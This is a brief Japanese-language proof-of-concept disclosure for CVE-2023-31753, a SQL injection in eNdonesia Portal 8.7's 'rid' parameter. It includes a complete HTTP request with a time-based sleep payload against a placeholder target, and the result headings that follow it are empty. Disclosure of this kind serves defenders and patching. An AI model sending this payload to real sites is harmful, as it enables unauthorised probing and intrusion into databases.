
CVE-2023-31753 - eNdonesia Portal 8.7 の概念実証
説明: eNdonesia Portal v8.7 に SQL インジェクションの脆弱性が発見されました。これは、diskusi.php の "rid" パラメータに細工したペイロードを挿入することで悪用されます。
#POC:
この脆弱性を悪用するには、以下の HTTP リクエストの "rid" GET パラメータの値として SQLi sleep ペイロードを送信する必要があります。
脆弱性のあるリクエスト:
GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0
** 20 秒の遅延:

** 30 秒の遅延:
